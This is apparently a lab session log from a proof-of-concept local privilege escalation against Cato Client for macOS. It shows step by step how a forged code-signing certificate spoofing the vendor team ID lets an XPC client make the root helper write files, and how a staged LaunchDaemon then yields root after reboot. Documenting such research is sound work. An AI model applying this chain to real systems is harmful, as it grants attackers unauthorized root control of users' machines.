# Cato SecureStore XPC LPE — lab PoC session log # Target: Cato Client for macOS 5.13.0 (build 10503) # Date: Sun Jun 21 13:04:29 +04 2026 # Note: Authorized lab use only. Standard user (no sudo). $ date Sun Jun 21 13:04:29 +04 2026 $ sudo -v Sorry, user dexter may not run sudo on dexters-lab. $ ./exploit.sh [*] Cato SecureStore LPE PoC [*] Workdir: /tmp/cato-securestore.ZPhGUJ [*](1/7) Checking installed Cato Client target ... Version: 5.13.0 Build: 10503 [!] Build differs from the analyzed package: expected 10208, found 10503. [!] Continuing; set STRICT_BUILD=1 to require the exact analyzed build. [+] Target surface matches expected vulnerable build. [*](2/7) Creating isolated keychain ... [*](3/7) Generating self-signed code-signing certificate with OU=CKGSB8CH43 ... - Generating RSA-2048 certificate - Exporting certificate as Apple-compatible PKCS#12 - Importing certificate into temporary keychain - Allowing codesign to access the key subject=C=US, O=Cato Research PoC, OU=CKGSB8CH43, CN=CatoSecureStorePoC [*](4/7) Writing and compiling XPC client ... [*](5/7) Signing XPC client with OU=CKGSB8CH43 certificate ... Executable=/private/tmp/cato-securestore.ZPhGUJ/cato_securestore_poc Identifier=cato_securestore_poc Format=Mach-O thin (arm64) CodeDirectory v=20400 size=301 flags=0x0(none) hashes=4+2 location=embedded Signature size=1876 Authority=CatoSecureStorePoC Signed Time=21 Jun 2026 at 1:04:43 PM Info.plist=not bound TeamIdentifier=not set Sealed Resources=none Internal requirements count=1 size=96 [*](6/7) Runtime vulnerability probe through the helper ... Probe file: /tmp/cato-securestore.ZPhGUJ/probe.plist Probe owner: root [+] Probe confirmed root helper file write. [*](7/7) Staging LaunchDaemon root-execution proof ... LaunchDaemon: /Library/LaunchDaemons/com.cato.research.securestore-poc.plist Owner: root:wheel /Library/LaunchDaemons/com.cato.research.securestore-poc.plist: OK [+] Exploit staged. [+] Reboot the lab Mac to trigger root execution. [+] After reboot, check: cat /var/tmp/cato_securestore_lpe_id_ [+] Expected proof contains uid=0(root). The payload removes /Library/LaunchDaemons/com.cato.research.securestore-poc.plist after it runs. # --- reboot --- $ cat /var/tmp/cato_securestore_lpe_id_1782032359 uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),702(com.apple.sharepoint.group.2),701(com.apple.sharepoint.group.1),101(access_bpf),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) root